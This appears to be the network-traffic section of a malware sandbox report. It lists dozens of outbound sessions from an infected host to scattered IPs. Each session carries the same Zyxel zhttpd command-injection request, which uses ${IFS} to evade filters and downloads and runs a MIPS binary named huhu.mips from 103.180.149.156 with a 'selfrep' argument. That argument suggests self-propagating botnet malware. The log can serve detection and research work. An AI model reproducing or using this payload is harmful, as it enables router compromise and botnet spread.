                                                        Feb 2, 2024 06:20:58.703474998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1712192.168.2.1437868112.189.78.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703522921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1713192.168.2.1447108157.50.177.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703567028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1714192.168.2.1458296205.168.216.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703597069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1715192.168.2.1452206177.8.84.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703632116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1716192.168.2.1438486140.184.58.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703671932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1717192.168.2.1437762103.254.201.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703728914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1718192.168.2.143516857.140.48.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703757048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1719192.168.2.1438864133.112.221.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703811884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1720192.168.2.145742278.85.227.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703841925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1721192.168.2.145019884.46.127.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703902006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1722192.168.2.144705234.25.103.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703928947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1723192.168.2.145295272.75.185.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703975916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1724192.168.2.1444584114.204.106.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.703988075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1725192.168.2.1437828194.227.200.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704024076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1726192.168.2.1450516174.11.244.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704070091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1727192.168.2.1439914191.252.182.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704102039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1728192.168.2.145901266.70.189.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704152107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1729192.168.2.1448656130.131.50.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704194069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1730192.168.2.1433432134.15.16.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704236031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1731192.168.2.144720032.127.182.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704283953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1732192.168.2.1442150160.152.163.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704333067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1733192.168.2.144091097.237.240.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704351902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1734192.168.2.1437788143.75.50.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704411983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1735192.168.2.145429059.131.39.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704453945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1736192.168.2.1444002174.250.21.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704473972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1737192.168.2.1435176167.253.246.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704524994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1738192.168.2.1440606143.164.162.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704569101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1739192.168.2.1447582197.246.49.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704610109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1740192.168.2.1447058185.94.235.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704646111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1741192.168.2.1459208164.118.64.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704677105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1742192.168.2.145128467.130.63.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704722881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1743192.168.2.143760881.221.155.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704740047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1744192.168.2.1443144109.142.173.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704777956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1745192.168.2.1438090188.249.232.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704807997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1746192.168.2.1437928101.119.29.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704870939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1747192.168.2.1457040155.99.220.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704902887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1748192.168.2.143611618.102.125.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704927921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1749192.168.2.145029881.148.131.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.704955101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1750192.168.2.1456766178.177.232.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.705008030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1751192.168.2.143524663.197.98.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.705049038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1752192.168.2.1437382220.224.37.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.705095053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1753192.168.2.145716880.62.240.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.705137014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1754192.168.2.1443168117.143.18.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.705167055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1755192.168.2.143859812.153.169.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.705214977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1756192.168.2.145785684.125.10.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.705333948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1757192.168.2.1448958118.223.232.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.705450058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1758192.168.2.144617495.241.117.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.705614090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1759192.168.2.1452624203.210.132.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.706176043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1760192.168.2.145097244.25.153.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.706598043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1761192.168.2.1434230194.145.140.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709108114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1762192.168.2.1446552188.97.112.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709146023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1763192.168.2.14502728.139.195.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709203959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1764192.168.2.145860634.85.201.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709233046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1765192.168.2.1437610181.90.154.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709285975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1766192.168.2.1456444198.210.57.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709304094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1767192.168.2.1460534156.175.198.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709336996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1768192.168.2.145414423.82.101.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709383965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1769192.168.2.145997453.1.178.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709414005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1770192.168.2.145117620.206.198.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709467888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1771192.168.2.1458816191.203.90.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709496021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1772192.168.2.14502745.13.127.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709548950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1773192.168.2.145118638.215.248.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709580898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1774192.168.2.145303842.163.45.207443
                                                        TimestampBytes transferredDirectionData
